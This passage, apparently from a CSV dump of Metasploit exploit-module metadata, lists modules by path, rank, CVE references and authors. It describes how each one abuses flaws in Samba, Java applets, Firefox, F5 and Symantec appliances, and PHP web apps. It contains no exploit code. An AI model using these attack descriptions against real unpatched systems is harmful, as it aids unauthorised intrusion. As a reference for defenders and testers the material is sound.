overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 81,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb","exploit","linux/ssh/f5_bigip_known_privkey","exploit/linux/ssh/f5_bigip_known_privkey","F5 BIG-IP SSH Private Key Exposure",600,"F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.","Metasploit Framework License (BSD)","t","2012-06-11 00:00:00",0,,"aggressive","t","CVE-2012-1493, OSVDB-82780, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell, URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt","egypt " 82,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ssh/symantec_smg_ssh.rb","exploit","linux/ssh/symantec_smg_ssh","exploit/linux/ssh/symantec_smg_ssh","Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",600,"This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote.","Metasploit Framework License (BSD)","t","2012-08-27 00:00:00",0,,"aggressive","t","BID-55143, CVE-2012-3579, OSVDB-85028, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00, URL-https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt","Ben Williams, Stefan Viehbock, sinn3r " 83,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb","exploit","linux/telnet/telnet_encrypt_keyid","exploit/linux/telnet/telnet_encrypt_keyid","Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",500,"This module exploits a buffer overflow in the encryption option handler of the Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions use NetKit-derived telnet daemons, so this flaw only applies to a small subset of Linux systems running telnetd.","Metasploit Framework License (BSD)","t","2011-12-23 00:00:00",0,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, OSVDB-78020","Brandon Perry , Dan Rosenberg, Jaime Penalba Estebanez , hdm " 84,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_escape_retval.rb","exploit","multi/browser/firefox_escape_retval","exploit/multi/browser/firefox_escape_retval","Firefox 3.5 escape() Return Value Memory Corruption",300,"This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.","Metasploit Framework License (BSD)","f","2009-07-13 00:00:00",0,,"passive","t","BID-35660, CVE-2009-2477, OSVDB-55846, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=503286","Simon Berry-Byrne , hdm " 85,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_queryinterface.rb","exploit","multi/browser/firefox_queryinterface","exploit/multi/browser/firefox_queryinterface","Firefox location.QueryInterface() Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package.","Metasploit Framework License (BSD)","f","2006-02-02 00:00:00",,,"passive","t","BID-16476, CVE-2006-0295, OSVDB-22893, URL-http://www.mozilla.org/security/announce/mfsa2006-04.html","hdm " 86,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_svg_plugin.rb","exploit","multi/browser/firefox_svg_plugin","exploit/multi/browser/firefox_svg_plugin","Firefox 17.0.1 Flash Privileged Code Injection",600,"This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG ""use"" element in the (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.","Metasploit Framework License (BSD)","f","2013-01-08 00:00:00",0,,"passive","t","CVE-2013-0757, CVE-2013-0758, URL-http://www.mozilla.org/security/announce/2013/mfsa2013-15.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=813906","Marius Mlynski, joev, sinn3r " 87,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb","exploit","multi/browser/firefox_xpi_bootstrapped_addon","exploit/multi/browser/firefox_xpi_bootstrapped_addon","Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",600,"This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks ""install"", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be ""bootstrapped"". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.","Metasploit Framework License (BSD)","f","2007-06-27 00:00:00",1,,"passive","t","URL-http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector, URL-https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions","mihi" 88,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/itms_overflow.rb","exploit","multi/browser/itms_overflow","exploit/multi/browser/itms_overflow","Apple OS X iTunes 8.1.1 ITMS Overflow",500,"This modules exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser and in Safari, itms urls will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used.","Metasploit Framework License (BSD)","f","2009-06-01 00:00:00",0,,"passive","t","CVE-2009-0950, OSVDB-54833, URL-http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html, URL-http://support.apple.com/kb/HT3592","Will Drewry " 89,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_atomicreferencearray.rb","exploit","multi/browser/java_atomicreferencearray","exploit/multi/browser/java_atomicreferencearray","Java AtomicReferenceArray Type Violation Vulnerability",600,"This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.","Metasploit Framework License (BSD)","f","2012-02-14 00:00:00",0,,"passive","t","BID-52161, CVE-2012-0507, OSVDB-80724, URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx, URL-http://schierlm.users.sourceforge.net/TypeConfusion.html, URL-http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3, URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507, URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again","Jeroen Frijters, egypt , juan vazquez , sinn3r " 90,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_calendar_deserialize.rb","exploit","multi/browser/java_calendar_deserialize","exploit/multi/browser/java_calendar_deserialize","Sun Java Calendar Deserialization Privilege Escalation",600,"This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).","Metasploit Framework License (BSD)","f","2008-12-03 00:00:00",0,,"passive","t","CVE-2008-5353, OSVDB-50500, URL-http://blog.cr0.org/2009/05/write-once-own-everyone.html, URL-http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html, URL-http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1","hdm , sf " 91,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_getsoundbank_bof.rb","exploit","multi/browser/java_getsoundbank_bof","exploit/multi/browser/java_getsoundbank_bof","Sun Java JRE getSoundbank file:// URI Buffer Overflow",500,"This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-36881, CVE-2009-3867, OSVDB-59711, URL-http://zerodayinitiative.com/advisories/ZDI-09-076/","jduck , kf " 92,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_exec.rb","exploit","multi/browser/java_jre17_exec","exploit/multi/browser/java_jre17_exec","Java 7 Applet Remote Code Execution",600,"The exploit takes advantage of two issues in JDK 7: The ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for classForName back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6) in order to access Statement.acc's private field, modify AccessControlContext, and then disable Security Manager. Once Security Manager is disabled, we can execute arbitrary Java code. Our exploit has been tested successfully against multiple platforms, including: IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.","Metasploit Framework License (BSD)","f","2012-08-26 00:00:00",0,,"passive","t","CVE-2012-4681, OSVDB-84867, URL-http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html, URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/, URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html, URL-http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html, URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day","Adam Gowdiak, James Forshaw, jduck , juan vazquez , sinn3r " 93,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb","exploit","multi/browser/java_jre17_glassfish_averagerangestatisticimpl","exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl","Java Applet AverageRangeStatisticImpl Remote Code Execution",600,"This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56054, CVE-2012-5076, OSVDB-86363, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html, URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf, URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076","Unknown, juan vazquez " 94,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jaxws.rb","exploit","multi/browser/java_jre17_jaxws","exploit/multi/browser/java_jre17_jaxws","Java Applet JAX-WS Remote Code Execution",600,"This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56054, CVE-2012-5076, OSVDB-86363, URL-http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx, URL-http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html","Unknown, juan vazquez " 95,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jmxbean.rb","exploit","multi/browser/java_jre17_jmxbean","exploit/multi/browser/java_jre17_jmxbean","Java Applet JMX Remote Code Execution",600,"This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.","Metasploit Framework License (BSD)","f","2013-01-10 00:00:00",0,,"passive","t","CVE-2013-0422, URL-http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/, URL-http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html, URL-http://pastebin.com/cUG2ayjh, US-CERT-VU-625617","Unknown, egypt , juan vazquez , sinn3r " 96,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb","exploit","multi/browser/java_jre17_jmxbean_2","exploit/multi/browser/java_jre17_jmxbean_2","Java Applet JMX Remote Code Execution",600,"This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.","Metasploit Framework License (BSD)","f","2013-01-19 00:00:00",0,,"passive","t","BID-57726, CVE-2013-0431, OSVDB-89613, URL-http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html, URL-http://pastebin.com/QWU1rqjf, URL-http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf","Adam Gowdiak, SecurityObscurity, Unknown, juan vazquez " 97,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_method_handle.rb","exploit","multi/browser/java_jre17_method_handle","exploit/multi/browser/java_jre17_method_handle","Java Applet Method Handle Remote Code Execution",600,"This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56057, CVE-2012-5088, OSVDB-86352, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf, URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf","Unknown, juan vazquez " 98,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_reflection_types.rb","exploit","multi/browser/java_jre17_reflection_types","exploit/multi/browser/java_jre17_reflection_types","Java Applet Reflection Type Confusion Remote Code Execution",600,"This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.","Metasploit Framework License (BSD)","f","2013-01-10 00:00:00",0,,"passive","t","BID-59162, CVE-2013-2423, OSVDB-92348, URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f, URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html, URL-http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0, URL-http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html","Jeroen Frijters, juan vazquez " 99,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_rhino.rb","exploit","multi/browser/java_rhino","exploit/multi/browser/java_rhino","Java Applet Rhino Script Engine Remote Code Execution",600,"This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)","Metasploit Framework License (BSD)","f","2011-10-18 00:00:00",0,,"passive","t","CVE-2011-3544, OSVDB-76500, URL-http://schierlm.users.sourceforge.net/CVE-2011-3544.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-305/","Edward D. Teach , Michael Schierl, juan vazquez , sinn3r " 100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_rmi_connection_impl.rb","exploit","multi/browser/java_rmi_connection_impl","exploit/multi/browser/java_rmi_connection_impl","Java RMIConnectionImpl Deserialization Privilege Escalation",600,"This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.","Metasploit Framework License (BSD)","f","2010-03-31 00:00:00",0,,"passive","t","CVE-2010-0094, OSVDB-63484, URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html","Matthias Kaiser, Sami Koivu, egypt " 101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_setdifficm_bof.rb","exploit","multi/browser/java_setdifficm_bof","exploit/multi/browser/java_setdifficm_bof","Sun Java JRE AWT setDiffICM Buffer Overflow",500,"This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-36881, CVE-2009-3869, OSVDB-59710, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-078/","jduck " 102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_signed_applet.rb","exploit","multi/browser/java_signed_applet","exploit/multi/browser/java_signed_applet","Java Signed Applet Social Engineering Code Execution",600,"This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the ""Publisher"" line. Newer JVMs display ""UNKNOWN"" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks ""run"", the applet executes with full user permissions.","Metasploit Framework License (BSD)","f","1997-02-19 00:00:00",1,,"passive","t","URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf, URL-http://www.spikezilla-software.com/blog/?p=21","natron " 103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_trusted_chain.rb","exploit","multi/browser/java_trusted_chain","exploit/multi/browser/java_trusted_chain","Java Statement.invoke() Trusted Method Chain Privilege Escalation",600,"This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.","Metasploit Framework License (BSD)","f","2010-03-31 00:00:00",0,,"passive","t","CVE-2010-0840, OSVDB-63483, URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html","Matthias Kaiser, Sami Koivu, egypt " 104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_verifier_field_access.rb","exploit","multi/browser/java_verifier_field_access","exploit/multi/browser/java_verifier_field_access","Java Applet Field Bytecode Verifier Cache Remote Code Execution",600,"This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.","Metasploit Framework License (BSD)","f","2012-06-06 00:00:00",0,,"passive","t","BID-52161, CVE-2012-1723, OSVDB-82877, URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9, URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b, URL-http://schierlm.users.sourceforge.net/CVE-2012-1723.html, URL-http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=829373","Stefan Cornelius, juan vazquez , littlelightlittlefire, mihi, sinn3r " 105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/mozilla_compareto.rb","exploit","multi/browser/mozilla_compareto","exploit/multi/browser/mozilla_compareto","Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC.","Metasploit Framework License (BSD)","f","2005-07-13 00:00:00",0,,"passive","t","BID-14242, CVE-2005-2265, OSVDB-17968, URL-http://www.mozilla.org/security/announce/mfsa2005-50.html","Aviv Raff , hdm " 106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/mozilla_navigatorjava.rb","exploit","multi/browser/mozilla_navigatorjava","exploit/multi/browser/mozilla_navigatorjava","Mozilla Suite/Firefox Navigator Object Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.","Metasploit Framework License (BSD)","f","2006-07-25 00:00:00",,,"passive","t","BID-19192, CVE-2006-3677, OSVDB-27559, URL-http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html, URL-http://www.mozilla.org/security/announce/mfsa2006-45.html","hdm " 107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/opera_configoverwrite.rb","exploit","multi/browser/opera_configoverwrite","exploit/multi/browser/opera_configoverwrite","Opera 9 Configuration Overwrite",600,"Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code.","BSD License","f","2007-03-05 00:00:00",0,,"passive","t","OSVDB-66472","egypt " 108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/opera_historysearch.rb","exploit","multi/browser/opera_historysearch","exploit/multi/browser/opera_historysearch","Opera historysearch XSS",600,"Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61.","BSD License","f","2008-10-23 00:00:00",0,,"passive","t","BID-31869, CVE-2008-4696, OSVDB-49472, URL-http://www.opera.com/support/kb/view/903/","Aviv Raff , Roberto Suggi, egypt " 109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/qtjava_pointer.rb","exploit","multi/browser/qtjava_pointer","exploit/multi/browser/qtjava_pointer","Apple QTJava toQTPointer() Arbitrary Memory Access",600,"This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.","Metasploit Framework License (BSD)","f","2007-04-23 00:00:00",,,"passive","t","BID-23608, CVE-2007-2175, OSVDB-34178, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-023.html","ddz , hdm , kf " 110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb","exploit","multi/fileformat/adobe_u3d_meshcont","exploit/multi/fileformat/adobe_u3d_meshcont","Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",400,"This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-13 00:00:00",0,,"aggressive","t","BID-36665, CVE-2009-2990, OSVDB-58920, URL-http://sites.google.com/site/felipeandresmanzano/, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html","Felipe Andres Manzano , jduck " 111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/maple_maplet.rb","exploit","multi/fileformat/maple_maplet","exploit/multi/fileformat/maple_maplet","Maple Maplet File Creation and Command Execution",600,"This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal maple worksheet without user interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",0,,"aggressive","t","OSVDB-64541, URL-http://www.maplesoft.com/products/maple/","scriptjunkie" 112,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/peazip_command_injection.rb","exploit","multi/fileformat/peazip_command_injection","exploit/multi/fileformat/peazip_command_injection","PeaZip <= 2.6.1 Zip Processing Command Injection",600,"This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user.","Metasploit Framework License (BSD)","f","2009-06-05 00:00:00",0,,"aggressive","t","CVE-2009-2261, EDB-8881, OSVDB-54966, URL-http://peazip.sourceforge.net/","Nine:Situations:Group::pyrokinesis, jduck " 113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb","exploit","multi/ftp/wuftpd_site_exec_format","exploit/multi/ftp/wuftpd_site_exec_format","WU-FTPD SITE EXEC/INDEX Format String Vulnerability",500,"This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.","Metasploit Framework License (BSD)","t","2000-06-22 00:00:00",0,,"aggressive","t","BID-1387, CVE-2000-0573, OSVDB-11805","jduck " 114,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/handler.rb","exploit","multi/handler","exploit/multi/handler","Generic Payload Handler",0,"This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.","Metasploit Framework License (BSD)","f",,0,,"aggressive","t",,"hdm " 115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/activecollab_chat.rb","exploit","multi/http/activecollab_chat","exploit/multi/http/activecollab_chat","Active Collab ""chat module"" <= 2.3.8 Remote PHP Code Injection Exploit",600,"This module exploits an arbitrary code injection vulnerability in the chat module that is part of Active Collab by abusing a preg_replace() using the /e modifier and its replacement string using double quotes. The vulnerable function can be found in activecollab/application/modules/chat/functions/html_to_text.php.","Metasploit Framework License (BSD)","f","2012-05-30 00:00:00",0,,"aggressive","t","OSVDB-81966, URL-http://www.activecollab.com/downloads/category/4/package/62/releases","mr_me " 116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb","exploit","multi/http/ajaxplorer_checkinstall_exec","exploit/multi/http/ajaxplorer_checkinstall_exec","AjaXplorer checkInstall.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.","Metasploit Framework License (BSD)","f","2010-04-04 00:00:00",0,,"aggressive","t","BID-39334, OSVDB-63552","David Maciejak, Julien Cayssol, sinn3r " 117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/apprain_upload_exec.rb","exploit","multi/http/apprain_upload_exec","exploit/multi/http/apprain_upload_exec","appRain CMF Arbitrary PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in appRain's Content Management Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a malicious user can upload a file to the uploads/ directory without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",0,,"aggressive","t","BID-51576, CVE-2012-1153, EDB-18392, OSVDB-78473","EgiX, sinn3r " 118,"2013-05-07 